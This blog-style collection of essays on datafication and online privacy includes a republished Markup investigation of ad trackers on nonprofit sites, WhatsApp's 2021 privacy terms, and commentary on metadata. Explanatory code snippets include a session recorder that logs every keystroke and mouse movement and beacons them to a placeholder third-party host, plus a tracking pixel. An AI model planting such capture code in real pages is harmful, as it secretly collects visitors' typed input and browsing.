Datafication & Technology

Datafication, Phantasmagoria of the 21st Century


Something Is Broken… (from The Markup)

Nonprofit Websites Are Riddled With Ad Trackers

Such organizations often deal in sensitive issues, like mental health, addiction, and reproductive rights—and many are feeding data about website visitors to corporations

By: Alfred Ng and Maddy Varner

Originally published on themarkup.org

Last year, nearly 200 million people visited the website of Planned Parenthood, a nonprofit that many people turn to for very private matters like sex education, access to contraceptives, and access to abortions. What those visitors may not have known is that as soon as they opened plannedparenthood.org, some two dozen ad trackers embedded in the site alerted a slew of companies whose business is not reproductive freedom but gathering, selling, and using browsing data. 

The Markup ran Planned Parenthood’s website through our Blacklight tool and found 28 ad trackers and 40 third-party cookies tracking visitors, in addition to so-called “session recorders” that could be capturing the mouse movements and keystrokes of people visiting the homepage in search of things like information on contraceptives and abortions. The site also contained trackers that tell Facebook and Google if users visited the site.
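For readers curious about the mechanics, here is a minimal sketch of how this kind of scan can be approximated. It is not The Markup's actual Blacklight pipeline, just an illustration using the Puppeteer browser automation library: load a page in a headless browser and log every network request that goes to a host other than the site itself.

```typescript
// Minimal sketch of a tracker scan, NOT The Markup's Blacklight itself.
// Assumes Node.js with Puppeteer installed (npm install puppeteer).
import puppeteer from "puppeteer";

async function thirdPartyHosts(url: string): Promise<Set<string>> {
  const browser = await puppeteer.launch();
  const page = await browser.newPage();
  const firstParty = new URL(url).hostname;
  const hosts = new Set<string>();

  // Every network request the page makes passes through this handler.
  page.on("request", (request) => {
    const host = new URL(request.url()).hostname;
    if (!host) return; // skip data: URLs and the like
    // A request to a different host is a third-party request; real tools
    // additionally match hosts against curated tracker lists.
    if (host !== firstParty && !host.endsWith("." + firstParty)) {
      hosts.add(host);
    }
  });

  await page.goto(url, { waitUntil: "networkidle2" });
  await browser.close();
  return hosts;
}

// Example: list the third-party hosts contacted by a homepage.
thirdPartyHosts("https://example.org").then((hosts) => {
  for (const h of hosts) console.log(h);
});
```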

The Markup’s scan found Planned Parenthood’s site communicating with companies like Oracle, Verizon, LiveRamp, TowerData, and Quantcast—some of which have made a business of assembling and selling access to masses of digital data about people’s habits. 

Katie Skibinski, vice president for digital products at Planned Parenthood, said the data collected on its website is “used only for internal purposes by Planned Parenthood and our affiliates,” and the company doesn’t “sell” data to third parties. 

“While we aim to use data to learn how we can be most impactful, at Planned Parenthood, data-driven learning is always thoughtfully executed with respect for patient and user privacy,” Skibinski said. “This means using analytics platforms to collect aggregate data to gather insights and identify trends that help us improve our digital programs.” 

Skibinski did not dispute that the organization shares data with third parties, including data brokers. 

A Blacklight scan of Planned Parenthood Gulf Coast—a localized website specifically for people in the Gulf region, including Texas, where abortion has been essentially outlawed—turned up similar results. 

Planned Parenthood is not alone when it comes to nonprofits, some operating in sensitive areas like mental health and addiction, gathering and sharing data on website visitors.

Using our Blacklight tool, The Markup scanned more than 23,000 websites of nonprofit organizations, including those belonging to abortion providers and nonprofit addiction treatment centers. The Markup used the IRS’s nonprofit master file to identify nonprofits that have filed a tax return since 2019 and that the agency categorizes as focusing on areas like mental health and crisis intervention, civil rights, and medical research. We then examined each nonprofit’s website as publicly listed in GuideStar. We found that about 86 percent of them had third-party cookies or tracking network requests. By comparison, when The Markup did a survey of the top 80,000 websites in 2020, we found 87 percent used some type of third-party tracking. 

About 11 percent of the 23,856 nonprofit websites we scanned had a Facebook pixel embedded, while 18 percent used the Google Analytics “Remarketing Audiences” feature. 

The Markup found that 439 of the nonprofit websites loaded scripts called session recorders, which can monitor visitors’ clicks and keystrokes. Eighty-nine of those were for websites that belonged to nonprofits that the IRS categorizes as primarily focusing on mental health and crisis intervention issues.

“As a user of this website, by sharing your information with them, you probably don’t assume that this sensitive information is shared with third parties and definitely don’t assume that your keystrokes are recorded,” Gunes Acar, a privacy researcher who copublished a 2017 study on session recorders, said. “The more sensitive the website is, the more worried I am.” 
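To make concrete what a "session recorder" does, here is a deliberately bare-bones sketch of the technique. It is illustrative only, not the code of any actual product, and the collection endpoint is hypothetical, but the mechanism is the one described above: capture input events, batch them, and ship them to a third-party server.

```typescript
// Bare-bones illustration of session recording; real products are far
// more elaborate. The endpoint below is hypothetical.
type RecordedEvent =
  | { kind: "key"; key: string; ts: number }
  | { kind: "mouse"; x: number; y: number; ts: number };

const buffer: RecordedEvent[] = [];

// Capture every keystroke on the page, including text typed into forms
// before any submit button is ever clicked.
document.addEventListener("keydown", (e: KeyboardEvent) => {
  buffer.push({ kind: "key", key: e.key, ts: Date.now() });
});

// Capture mouse movements, which reveal what the visitor hovers over.
document.addEventListener("mousemove", (e: MouseEvent) => {
  buffer.push({ kind: "mouse", x: e.clientX, y: e.clientY, ts: Date.now() });
});

// Every few seconds, ship the batch to a third-party server.
setInterval(() => {
  if (buffer.length === 0) return;
  navigator.sendBeacon(
    "https://recorder.example.com/ingest", // hypothetical endpoint
    JSON.stringify(buffer.splice(0))
  );
}, 5000);
```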

Tracy Plevel, the vice president of development and community relations at Gateway Rehab, one of the nonprofits with session recorders on its site, said that the nonprofit uses trackers and session recorders because it needs to stay competitive with its larger, for-profit counterparts.

“As a nonprofit ourselves, we are up against for-profit providers with large advertising budgets as well as the addiction treatment brokers who grab those seeking care with similar online advertising tactics and connect them with the provider who is offering the greatest ‘sales’ compensation,” Plevel said. “Additionally we know user experience has a big impact on following through on treatment. When someone is ready to commit to treatment, we need to ensure it [is] as easy as possible for them before they get frustrated or intimidated by the process.” 

Other nonprofits had a significant number of trackers embedded on their sites as well. The Markup found 26 ad trackers and 50 third-party cookies on the website of The Clinic at Sharma-Crawford Attorneys at Law, a Kansas City legal clinic that represents low-income people facing deportation.

Rekha Sharma-Crawford, the board president of The Clinic, wrote in an emailed statement, “We take privacy and security concerns very seriously and will continue to work with our web provider to address the issues you have identified.”

Save the Children, a humanitarian aid organization founded more than 100 years ago, had 26 ad trackers and 49 third-party cookies. March of Dimes, a nonprofit started by President Franklin D. Roosevelt that focuses on maternal and infant care, had more than 29 ad trackers on its site and 58 third-party cookies. City of Hope, a Californian cancer treatment and research center, had 25 ad trackers and 47 third-party cookies. 

Paul Butcher, assistant vice president of global digital strategy at Save the Children, said in an emailed statement that the organization “takes data protection very seriously.” Butcher also wrote that Save the Children collects some data through ad trackers “to improve user experience” and that the organization is in the process of revamping its data retention policies and recently hired a new head of data.

March of Dimes and City of Hope did not respond to requests for comment.

State-Level Privacy Laws Miss Nonprofits

While HIPAA governs health data and FERPA regulates educational records, there are no federal laws governing how websites track their visitors. Recently, a few states—California, Virginia, and Colorado—have enacted consumer privacy laws that require companies to disclose their tracking practices and allow visitors to opt out of data collection. 

But nonprofits in two of those states, California and Virginia, don’t need to adhere to the regulations. 

Sen. Ron Wyden (D-OR), who has proposed his own federal privacy legislation, said that nonprofits accrue a large amount of potentially sensitive data. 

“Nonprofits store incredibly personal information about things we’re passionate about, from political causes and social views to which charitable causes we care about,” Wyden said in an emailed statement. “If a data breach reveals someone donates to a domestic violence support group or an LGBTQ rights organization or the name of their mosque, any of that information could be incredibly private.”

Nonprofit leaders, however, argue that they lack the infrastructure and funding to comply with privacy law requirements and must gather and share information on donors in order to survive. 

“One of the most substantive and impactful uses of data by nonprofits has been our fundraising,” said Shannon McCracken, the CEO of The Nonprofit Alliance, an advocacy group made up of nonprofits and businesses. “Without the ability to cost-effectively reach prospective new donors and current donors, then nonprofits can’t continue to be as impactful as they are today.” 

But purposeful or not, privacy experts say, nonprofits are feeding personal information to data brokers and tech giants like Facebook and Google. 

“A nonprofit might share your phone number and name with LiveRamp. Tomorrow, a for-profit entity can then reuse that same data to target you,” said Ashkan Soltani, a privacy expert and former chief technologist at the Federal Trade Commission. “The data flows that go into these third-party aggregators and data brokers come often from nonprofits as well.” 

Soltani, who was appointed executive director of the California Privacy Protection Agency on Oct. 4, helped draft the California Consumer Privacy Act, which was originally introduced with the nonprofit exemptions.

Many major nonprofits work with data brokers to help organize and analyze their data, Jan Masaoka, CEO of the California Association of Nonprofits, said. 

“People that have big donor lists use them extensively, pretty much all of them use one of the services,” Masaoka said. “They don’t keep it in-house, pretty much everybody keeps it with one of these services.” 

She noted that Blackbaud is a company that nonprofits often turn to. The registered data broker’s marketing material promotes a co-op database that combines donor data from more than 550 nonprofits with public information on millions of households. 

Blackbaud didn’t respond to a request for comment.

Because of a lack of funds, nonprofits also rely on third-party platforms—which also happen to be data brokers—to manage their data’s security and privacy, McCracken said. But these kinds of companies aren’t immune to cyberattacks either: Blackbaud disclosed a ransomware attack in 2020 in which hackers stole passwords, Social Security numbers, and banking information, according to a Securities and Exchange Commission filing. Hundreds of charitable organizations, schools, and hospitals were affected, along with more than 13 million people, according to the Identity Theft Resource Center. 

“They rely on this kind of problematic ecosystem to achieve their work, and as a result, they share number lists, email addresses, or browsing behavior with third-party advertising companies and subject their members to risk,” Soltani said.

The Exception

Unlike its predecessors in California and Virginia, Colorado’s privacy bill doesn’t have an exemption for nonprofits. 

In both California and Virginia, the bills’ main supporters gave nonprofits an exemption as a political maneuver. Alastair Mactaggart, a real estate developer and founder of Californians for Consumer Privacy, who was the driving force behind the California Consumer Privacy Act, said his proposal was already facing opposition from tech giants, and he didn’t want a political showdown with nonprofits, too. 

“You gotta take the first step, so we figured this was the one that would be the easiest to bounce off,” Mactaggart said. “Eventually, I hope that the big nonprofits are included as well.”

David Marsden, the state senator who introduced the Virginia Consumer Data Protection Act, echoed that sentiment, reflecting that the law wasn’t perfect but still a good start.

“Does this pick up everybody that it should, or exempt everybody who needs an exemption? Probably not, but it comes pretty close,” Marsden said. “We were able, with this bill, to get it passed without people getting up and objecting to what we were trying to do.” 

Colorado state senator Robert Rodriguez, who co-sponsored the state’s privacy bill, said he didn’t include an exemption for nonprofits because he felt that any entity that had data on more than 100,000 people should have to follow privacy protections. He also didn’t understand why other states had exemptions. 

“Someone that has over 100,000 records is a good size,” he said in an email. “They should have some protections or requirements to follow.” 

This article was originally published on The Markup and was republished under the Creative Commons Attribution-NonCommercial-NoDerivatives license.

WhatsApp Terms of Service & Privacy Policy as of March 2021

In the post “Why I Am Quitting WhatsApp – Part II” below I mention a link to the Terms of Service and the Privacy Policy. Since those terms change with time, I enclose below an excerpt of the terms as of 27 March 2021 in PDF format.

The clause “Information We Collect” is divided into three groups:

  1. Information you provide (hinting that the other two are information that you do NOT (and may not want to) provide),
  2. Automatically collected information,
  3. Third-party information.

Please see content below.

Information You Provide

• Your Account Information. You provide your mobile phone number to create a WhatsApp account. You provide us the phone numbers in your mobile address book on a regular basis, including those of both the users of our Services and your other contacts. You confirm you are authorized to provide us such numbers. You may also add other information to your account, such as a profile name, profile picture, and status message.

• Your Messages. We do not retain your messages in the ordinary course of providing our Services to you. Once your messages (including your chats, photos, videos, voice messages, files, and share location information) are delivered, they are deleted from our servers. Your messages are stored on your own device. If a message cannot be delivered immediately (for example, if you are offline), we may keep it on our servers for up to 30 days as we try to deliver it. If a message is still undelivered after 30 days, we delete it. To improve performance and deliver media messages more efficiently, such as when many people are sharing a popular photo or video, we may retain that content on our servers for a longer period of time. We also offer end-to-end encryption for our Services, which is on by default, when you and the people with whom you message use a version of our app released after April 2, 2016. End-to-end encryption means that your messages are encrypted to protect against us and third parties from reading them.

• Your Connections. To help you organize how you communicate with others, we may create a favorites list of your contacts for you, and you can create, join, or get added to groups and broadcast lists, and such groups and lists get associated with your account information.

• Customer Support. You may provide us with information related to your use of our Services, including copies of your messages, and how to contact you so we can provide you customer support. For example, you may send us an email with information relating to our app performance or other issues.

Automatically Collected Information

• Usage and Log Information. We collect service-related, diagnostic, and performance information. This includes information about your activity (such as how you use our Services, how you interact with others using our Services, and the like), log files, and diagnostic, crash, website, and performance logs and reports.

• Transactional Information. If you pay for our Services, we may receive information and confirmations, such as payment receipts, including from app stores or other third parties processing your payment.

• Device and Connection Information. We collect device-specific information when you install, access, or use our Services. This includes information such as hardware model, operating system information, browser information, IP address, mobile network information including phone number, and device identifiers. We collect device location information if you use our location features, such as when you choose to share your location with your contacts, view locations nearby or those others have shared with you, and the like, and for diagnostics and troubleshooting purposes such as if you are having trouble with our app’s location features.

• Cookies. We use cookies to operate and provide our Services, including to provide our Services that are web-based, improve your experiences, understand how our Services are being used, and customize our Services. For example, we use cookies to provide WhatsApp for web and desktop and other web-based services. We may also use cookies to understand which of our FAQs are most popular and to show you relevant content related to our Services. Additionally, we may use cookies to remember your choices, such as your language preferences, and otherwise to customize our Services for you. Learn more about how we use cookies to provide you our Services.

• Status Information. We collect information about your online and status message changes on our Services, such as whether you are online (your “online status”), when you last used our Services (your “last seen status”), and when you last updated your status message.

Third-Party Information

• Information Others Provide About You. We receive information other people provide us, which may include information about you. For example, when other users you know use our Services, they may provide your phone number from their mobile address book (just as you may provide theirs), or they may send you a message, send messages to groups to which you belong, or call you.

• Third-Party Providers. We work with third-party providers to help us operate, provide, improve, understand, customize, support, and market our Services. For example, we work with companies to distribute our apps, provide our infrastructure, delivery, and other systems, supply map and places information, process payments, help us understand how people use our Services, and market our Services. These providers may provide us information about you in certain circumstances; for example, app stores may provide us reports to help us diagnose and fix service issues.

• Third-Party Services. We allow you to use our Services in connection with third-party services. If you use our Services with such third-party services, we may receive information about you from them; for example, if you use the WhatsApp share button on a news service to share a news article with your WhatsApp contacts, groups, or broadcast lists on our Services, or if you choose to access our Services through a mobile carrier’s or device provider’s promotion of our Services. Please note that when you use third-party services, their own terms and privacy policies will govern your use of those services.

Algorithmic Sociality

I had a discussion about cell membranes and boundaries with a friend. The discussion arose from a quote by Fritjof Capra in his course The Systems View of Life: “Boundaries in the biological realm are not boundaries of separation but boundaries of identity”. My friend’s question was: “What is the function of a membrane in social dynamics?”

This discussion about social membranes creating social identity reminds me of the phenomenon of “filter bubbles” created by the algorithms of social media platforms (for those unfamiliar with the concept, Eli Pariser’s TED talk is a good entry point). Basically, by editing what information we get access to (through search or in our newsfeed), online algorithms create a membrane around us that narrowly defines our identity, and this is reinforced by constantly feeding us more of the same.


In 2017, I did an explorative and investigative study on Facebook to interrogate the algorithmic black box. I created two fake profiles, Samsara Marks (female) and Bertrand Wooster (male). Samsara’s profile was richly fleshed out (a highly educated professional with feminist interests), but I gave FB only minimal info about Bertrand: his age (late 40s), a (random) Hong Kong mobile number, his residency (Hong Kong), and his country of citizenship (UK). (Of course, FB had other pieces of digital info as well, even though I created the profile from a random computer at the university, behind its firewall.)


With this limited info, FB suggested 150 friends for Bertrand at the first login (interestingly, most of them outside of Hong Kong). I accepted all FB suggestions (and subsequent suggestions as well). I am not going to bore you with details, but to make a long story short, Bertrand found himself transported to the bowels of FB: explicit sexual content, prostitution, what I suspected could be pedophile networks, and “how to” videos on making weapons to shoot down missiles (I am not making this up), among other things. Friendless but highly accomplished Samsara, on the other hand, kept receiving ads for kitchen appliances and dresses.


My purpose for posting this is to bring attention to the active role of social platforms in shaping sociability and creating social membranes around us. One of the conclusions of the experiment was that, once the algorithms have established the membrane, it takes conscious effort, extreme determination and a very consistent strategy to change what the membrane lets in and out.

Private Messaging Apps

A good friend sent this link to me today: https://nordvpn.com/blog/most-secure-messaging-app. It’s a good article; you should read it. It did, however, prompt the thoughts below.

Good Morning! Thank you for sharing this!

It’s true that Signal is the most secure messaging app. I use both Telegram and Signal. They both have pros and cons, like all apps.

Since WhatsApp’s change of T&C, there have been many articles about the privacy of messaging apps. And that’s great, because the discussion brings awareness to this aspect of communication. However, I think it’s also the wrong (first) question to ask, because it is reductionist and puts the focus on the wrong thing. Let me explain!

The social web brought about shifts of a magnitude last seen with the invention of the printing press. The economy of the social web is supported by a model (targeted advertising) that is BY DESIGN hostile to our well-being, social balance and democratic values. When I say by design, I mean that the model itself contains in its essence imperatives that are fundamentally hostile to the above. It distorts debates, polarises society, addicts individuals. It can’t work if it doesn’t do that. Those effects are intrinsic to the model.

So what we are witnessing at the moment is nothing less than an ecological crisis. We have a digital social economy based on a model whose “side effects” are wreaking havoc in our lives and our societies (whether they are really “side” effects or just effects is another debate for another time).

In 1962, Rachel Carson wrote a seminal book called Silent Spring, a desperate call for the world to wake up to the large-scale slaughtering of our natural environment. Today we are faced with a similar crisis, an ecological crisis of our inner environments.

So, to go back to the question about the privacy of messaging apps: I said earlier that it’s a good question, of course, but the wrong question to start with. Apps are not created equal. They are not stand-alone, isolated entities. They exist in a larger system. Apps like Telegram and Signal (and a bunch of less popular messaging apps) are not owned by large monopolies whose profits rest on targeted advertising. They may or may not be the most secure, but even if they are not, the systemic effects of using them will be very different from those of using an app like WhatsApp or FB Messenger, which belong to a monopolistic entity that has shown many times it was ready to lie and manipulate with total disregard for the effects of its services on the planet.

So the first question to ask is: by using this technology, whose interests am I serving? To go back to the parallel with environmental ecology, asking whether an app is private is the equivalent of asking whether a good is too expensive without looking at the ecosystem that produces it. Maybe a good is expensive but it is of quality and produced in an ecosystem that favours small producers and benefits the real economy.

To be honest, most of us do NOT need messaging apps that absolutely protect our communications. None of what I have ever written to you or on our group chats, for example, warrants the level of secrecy required to keep state secrets, or to keep investigative journalists in authoritarian countries safe (or that type of thing).

And then, what do we mean by “private”? We have been habituated to think about privacy as hiding the content we share from the snooping eyes of government or police etc. This is surely one important aspect of privacy, but in the digital age it is far from the only one.

To understand why, we need to understand a fundamental difference that the FBs and Googles of the world are very careful not to emphasise: the difference between content and metadata. Content (or data) is what we share: the messages, the photos, the emojis, etc. Metadata is the collateral information that accompanies communication. Targeted advertising companies are metadata hungry, not content hungry (see the post below, “Why I Am Quitting WhatsApp Part II“).

Metadata is really the gold of the social internet, because when aggregated and analysed by the large systems of big data, it reveals things about us that we would not dream of sharing as content. And by the way, those insights are much more valuable than raw data and can be shared with governments, police etc.

This is why we need to become conscious digital consumers. Just as we try not to consume plastic straws or make efforts to buy sustainable coffee, we need to make efforts and care for what type of digital technology we consume. Remember that behind the app, there is a whole ecosystem.

I know people who decide to lead a sustainable lifestyle, only buy organic food and walk to work, but who consume technology with the gluttony of a pig and the lack of awareness of a 2-year-old (no disrespect to pigs and 2-year-olds here, this is what they are supposed to do! 😉). This is just not coherent!

TEDx Open Mic Follow Up: What Can we Do?

At the end of the open mic yesterday, you asked me a really important question and I do not think that my on-the-spot answer was explicit enough. The question was: “so what can we do?” It is a complex question. I thought about it last night and today and I would like to add a few more words which I hope will shed a clearer light on this complex matter. Here are some avenues for possible answers.

One way to think about an answer is to look at two possible levels of action: the systemic (policy) level and the individual level. At the policy level, regulation is coming. The EU has been the most aggressive so far (GDPR), but it will take time, because this phenomenon is complex and unprecedented, which means that at the moment there are no suitable laws to frame it and we do not even really understand how it works. Regulation will also likely be watered down by powerful networks of influence. In the US, the fact that Facebook and Google WANT the federal government to come up with regulation clearly shows that they are confident they have the power to lobby and influence the end result.

However, an increasing number of smart voices are putting forward creative propositions that could easily and quickly be put into action. One of them, for example, is Paul Romer (co-recipient of the Nobel Memorial Prize in Economic Sciences in 2018), who advocates a Digital Tax (Digital Ad-Tax) as an incentive for good behaviour. Compelling initiatives are coming from the arts world as well. Adam Harvey has done great work revealing the hidden datasets that feed the rise of AI-driven facial recognition. Manuel Beltrán’s Cartographies of Dispossession discloses the forms of systematic data dispossession. Taken individually, none of those propositions will make things right, but they all contribute to creating a more sustainable system.

The other level of action is individual; here we ask the question: “what can I do?”

As I said yesterday, I think that right now what is most urgently required is for us to become aware of what this all really means. The different debates around digital platform technology at the moment (privacy, fake news, misinformation, anti-trust etc.) are all parts of the same whole. The datafication of human experience is not only a technological issue; it is not only a social, economic or political issue; it is an ecological issue. Which means that we are dealing with a complex system. Complex systems present dilemmas rather than problems. Because they do not lend themselves readily to linear solutions, they ask for a change of mindset. They need to be tackled from different angles at the same time; they need time, flexibility and vision; and they demand from us something that humans usually find most challenging: changing our existing patterns of behaviour.

We need to change our behaviours. How? To be honest, as users, at the moment, we do not have much leverage. The digital universe we live in has emerged from a legal void and has largely been shaped by the major actors of the digital economy to serve their interests. We can’t opt out of the terms and conditions of the social platforms we use every day and keep using their services. Behavioural economics has revealed what psychologists have known about human nature for a long time: as emotional beings, we are easily manipulated. Behavioural economist Richard Thaler, the 2017 Nobel Prize recipient, and Cass Sunstein call this nudging, and wrote a book on the topic. For the past 30 years or so, BJ Fogg, from the Behaviour Design Lab at Stanford University, has been teaching students how to use technology to persuade people. He calls this discipline by a really interesting name: “captology”. Today, captology helps keep users captive.

However, we are not helpless. We do not have a wide array of choices, but that does not mean we have none. We do have one power: the power of voting with our feet. This means we need to change our behaviours. To say “I can’t leave this platform because everyone is there” is the digital equivalent of saying I will start recycling when the planet is clean. Google is not the only search engine (try DuckDuckGo), Chrome not the only browser (try Firefox), Gmail not the only email provider (try ProtonMail), WhatsApp not the only messaging app (try Signal or Telegram).

We also need to seriously (SERIOUSLY) reassess the personal values that underlie our consumption of digital technologies.

It’s convenient. We are creatures of habit, so convenience has been baked into the design of social tech to make us complacent and lazy. But convenience is not a value that yields the greatest results in terms of ecological sustainability. Today, we understand that our patterns of consumption (food, clothing etc.) affect our environment. So, even though it is more convenient to throw garbage out of the window, we make the effort to recycle. As informed and conscious consumers, we take great pains to consume consciously. And in doing so, we influence the companies that create the products we consume. Why don’t we adopt the same behaviours when it comes to digital?

It’s free. Would you really expect to go to the supermarket, pile food up in a trolley and leave without paying a cent? Would you find it completely natural to enter a [Prada] shop (fill in with the name of your preferred brand), pick up a few handbags, a jacket or two and some small leather goods and leave with a dashing smile on your face and your credit card safely in your bag? Last time I checked, those behaviours were called “stealing” and they were punished by law. As a rule of thumb, we need to remember the most important theorem of the digital age: “when it’s free, it’s not free”. Plus, to go back to the environment analogy, we also considered nature a free resource to be pilfered for our own profit. See how well we did with that? Just to put things in perspective, a paid account with the most secure email in the world, ProtonMail, costs US$50 a year. This is what you would spend on 8 mocha Frappuccinos at Starbucks (and ProtonMail is much better for your health). So don’t be shy, pay for sustainable, clean technology! This requires a major change of mindset, but we will all be better off in the end.

In his book “WTF? What’s the Future and Why It’s Up to Us”, Tim O’Reilly says that the master algorithm encoded by the targeted advertising business is optimised to be hostile to humanity. So, one last thought. Today we are still in the social media era, but how about tomorrow? The technologies in the making carry with them a level of intensity and a potential for behaviour modification, control and destruction unequaled in the history of humanity (see Jaron Lanier). It took us 60 years to wake up to the slaughtering of our natural environment; we won’t be given so much time to react to the slaughtering of human experience.

TEDx Open Mic: Datafication, Silent Spring of the Digital Age

This is the 3-minute presentation I gave at the TEDxTinHauWomen open mic on June 16th, 2021.

27 years ago, my son Alistair was born. As many of you know, giving birth is an intense experience, a mix of fear and exhilaration, and so many emotions and sensations that I can’t even start to name or describe. And then when your baby arrives, finally, the love you feel at that time is unlike anything you have ever felt before.

After Alistair was born, I did not think there was enough space in my heart to feel more love, but then my daughter Aurelie arrived. And something completely magical happened. The infinite love I felt for my first child expanded infinitely for my second child.

I am not a mathematician, so I do not know if there is a formula that can infinitely grow the infinite, but in my books, love or any other human experience is not something that can readily be turned into numbers. There is just something magical about human experience that defies quantification.

Today we live in a world where infinite love looks like this: [see image below]. That’s the “datafication” of our qualitative inner experience, and this so-called knowledge is used to make money.

Today we live in a world where infinite love looks like this (Image by Gerd Altmann from Pixabay)

There is a school of thought, anchored in positivism, which believes that people are just their behaviours, and that those behaviours can be divided into parts, turned into numbers and analysed to spit out a realistic picture of the world. That may be true in the hard sciences; it is not so true in the social realm.

This reductionist view of life predates digital, but until Big Data it was relatively contained. Then, in the early 2000s, Google needed to turn a profit. Their AdWords team realised that they could use the collateral behavioural data (“breadcrumbs”) that people left behind during search to make ads relevant not to keywords, as had been the case up to then, but to people. Targeted advertising was born, and with it, one of the most pivotal epistemological shifts in the history of humanity.

In 1962, environmentalist Rachel Carson wrote Silent Spring, a compelling call for the world to wake up to the large-scale slaughtering of our natural environment. Today, we are doing to human experience what we did to nature 60 years ago.

The digital datafication and commodification of human experience is creating a false knowledge of the world. It is significant because it is widespread and affects decision-making at small and large scales. It is dangerous because it is biased, because it is overpowering other forms of tacit knowledge that are more human friendly, and because it is fed back to us to help us orient ourselves in the world. And it is deeply unfair because it creates massive asymmetries of knowledge, and therefore of power.

YOU, WE can say no. But we have to become aware of what this means and we have to act together. This is my slightly desperate but mostly impassioned plea, and I hope you heard it!

Datafication as Phantasmagoria

My main argument is that datafication is the phantasmagoria of the 21st century, the same way mass consumerism was the phantasmagoria, or the dream, of the 20th century. My inspiration is the work of Walter Benjamin, The Arcades Project.

I am defining datafication as the quantification of qualitative aspects of life, i.e. human experience generally.

I am arguing that this phantasmagoria is creating a massive epistemological shift towards a more impoverished type of knowledge, because in this massive enterprise of quantification, what cannot be turned into computer data, in other words what cannot be quantified, is simply abandoned. And now that algorithms are making decisions in most areas of life, such as education, finance, justice and so on, this quantification has a direct impact on the system we live in.

More on this later…

Musings on Reductionism

A musing on reductionism, the type of thinking at the root of datafication, after an exchange with a friend on the topic.

He mentioned, rightly I believe, that there is a place for reductionist thinking; it is useful and even essential for many tasks. The problem starts when we think of it as the path to truth.

I agree.

My issue with reductionism is not that it is useless or “bad” (for lack of a better word) in and of itself, but that, in the datafied society of the early 21st century, where algorithms have taken over decision-making in many areas of life, it has become (or is fast becoming) the only valid source of knowledge. What can’t be reduced to computer data is for the most part abandoned. In other words: be subjugated or be forgotten.

As a society, we bask in the warm belief that progress is inherent to the digital revolution, and we congratulate ourselves for having left a boring 20th century behind. But the type of thinking underpinning the digital “revolution” comes straight from the 19th century, so where is the revolution? It is the pinnacle of the logico-linear, engineer type of thinking. I have nothing against engineers, they have an important place and role to play in our societies, but when this type of thinking colonises all areas of life and all dimensions of humaneness, and suppresses other ways of seeing and being in the world, I say: Houston, we have a problem.

Neil Postman (one of my favourite authors in the field of media studies, in many ways a visionary) touches upon this idea in his book “Technopoly: The Surrender of Culture to Technology”, a must-read! In a technopoly, the ideology underlying the technological tools becomes self-justifying and it is the technology that provides guidance to society instead of the other way round. 

Technopoly: The Surrender of Culture to Technology is a book by Neil Postman published in 1992 that describes the development and characteristics of a “technopoly”. He defines a technopoly as a society in which technology is deified, meaning “the culture seeks its authorisation in technology, finds its satisfactions in technology, and takes its orders from technology”. It is characterised by a surplus of information generated by technology, which technological tools are in turn employed to cope with, in order to provide direction and purpose for society and individuals. [Wikipedia]

Why I Am Quitting WhatsApp – Part II

A couple of months ago I sent a message that started as follows: “For the past 5 years, I have been doing PhD research on large social platforms. I want to share a few thoughts on why I am quitting WhatsApp before February 8th 2021.” The short memo was written after WhatsApp’s unilateral announcement that they were changing their T&C to accommodate WhatsApp For Business. Since then, Facebook has postponed the changes to May 15th after the announcement caused an uproar. 

Since I sent the message in January, I have received many questions and comments: some people quit WhatsApp altogether, some opened accounts on other messaging platforms (mostly Telegram and Signal), and some disagreed completely with my analysis and kept using WhatsApp as usual. Based on the rich discussions I have had with friends and acquaintances in the past few months, I want to share a few more thoughts before the change becomes reality. 

Why Did FB Postpone the Change to May 15th?

Delaying the change gave Facebook time to achieve two things. 

1. First, to rewrite the narrative through a process of habituation.

Habituation is a tactic that has been widely utilised by large social tech corporations in the past 15 years to gradually get us used to increasing encroachments on our privacy. 

The tactic works as follows:

  • Unilaterally announce the change. Ignore signs of disgruntlement. If the announcement causes a major uproar, issue a statement saying that you have been misunderstood and postpone. Lie low for a little while until some other news takes centre stage (that shouldn’t take too long). 
  • This gives you time to design a communication campaign that heavily emphasises specific (reassuring) aspects of the issue (e.g., privacy is built into our DNA, we do not have access to the content of your messages) and completely obfuscates the real issue (we do not care a bit about the content of your messages, we want to track your behaviour, not your words).
  • If opposition is too strong – for example, as in the case of the Facebook Beacon feature, implemented in 2007 and abandoned in 2009 after a class action lawsuit – find other technical ways to achieve the same goal. This is what FB did with Facebook Connect, embedding a piece of code in its Like button that sends information back to FB when you visit any unrelated site anywhere on the web (see the sketch after this list). 

2. Second, it allowed Facebook to think through and implement a campaign of misinformation (I am using the word purposefully). Disinformation is the phenomenon of spreading lies. Misinformation is the phenomenon of spreading half-truths to create confusion or take control of the main narrative. WhatsApp is emphasising that the CONTENT of our messages is and will always remain private. What WhatsApp is not saying is that they could not care less about that content, because the data they hunger for is metadata. 
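To illustrate the mechanism mentioned in the list above: any third-party script embedded in a page can report the visit back to its own servers, and because the browser attaches the cookies it holds for that third party’s domain, the visit can be tied to a logged-in account. Here is a hedged sketch of the general technique; the host and parameters are invented, and this is not Facebook’s actual code.

```typescript
// Generic sketch of an embedded widget "phoning home"; the domain and
// parameters are hypothetical, not Facebook's actual implementation.
const beacon = new Image();
beacon.src =
  "https://widget.example-social.com/ping" + // third-party tracker host
  "?page=" + encodeURIComponent(location.href) + // the page you are reading
  "&ref=" + encodeURIComponent(document.referrer); // where you came from
// Nothing visible changes on the page: the request itself is the data
// point, and the browser silently attaches any cookies it already holds
// for example-social.com, linking the visit to a known account.
```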

METADATA & PRIVACY

What’s Metadata? 

It is data about data, or data about your behaviour (not your words) when you are online. A few (non-exhaustive) examples are: who you know (your contacts), who you message, when and how often, who they know, who they message etc. But also, your device and user ID, your name, your location, your email, and all sorts of user and device content. In short, any activity that can be tracked and linked to you.
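A simple way to visualise the content/metadata split is as a data structure. In the sketch below, the field names are invented for illustration and are not WhatsApp’s actual schema: end-to-end encryption protects only the `body`, while every other field remains visible to the service.

```typescript
// Illustrative only; the field names are invented, not WhatsApp's schema.
interface EncryptedMessage {
  body: Uint8Array; // the content: ciphertext the server cannot read
}

interface MessageEnvelope {
  message: EncryptedMessage;
  senderId: string;    // who is talking
  recipientId: string; // to whom
  sentAt: number;      // when (and, aggregated over time, how often)
  deviceId: string;    // from which device
  ipAddress: string;   // and, roughly, from where
}
// Everything in MessageEnvelope except message.body is metadata:
// invisible to us as "content", yet enough, at scale, to map a social
// graph and daily habits.
```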

The Gold of the Internet

